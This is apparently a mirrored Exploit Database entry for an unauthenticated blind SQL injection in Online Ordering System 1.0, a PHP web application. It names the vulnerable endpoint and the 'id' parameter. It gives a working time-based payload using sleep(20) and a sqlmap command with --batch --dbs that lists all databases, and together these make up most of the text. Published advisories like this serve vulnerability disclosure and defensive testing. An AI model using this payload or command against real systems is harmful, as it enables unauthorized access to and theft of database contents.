Online Ordering System 1.0 – Blind SQL Injection (Unauthenticated)

• Exploit Database
• 17 阅读

• 作者： Suraj Bhosale
  日期： 2021-03-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49618/

• # Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
  # Date: 2021-03-04
  # Exploit Author: Suraj Bhosale
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
  # Version: v1.0
  # Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
  # Vulnerable Parameter: id
  
  *Steps to Reproduce:*
  1) Visit
  http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
  2) Now fire up the following command into SQLMAP.
  
  CMD: sqlmap -uhttp://localhost/onlineordering/GPST/admin/design.php?id=9
  <http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
  --batch --dbs
  
  3) Using the above command we will get the name of all the database.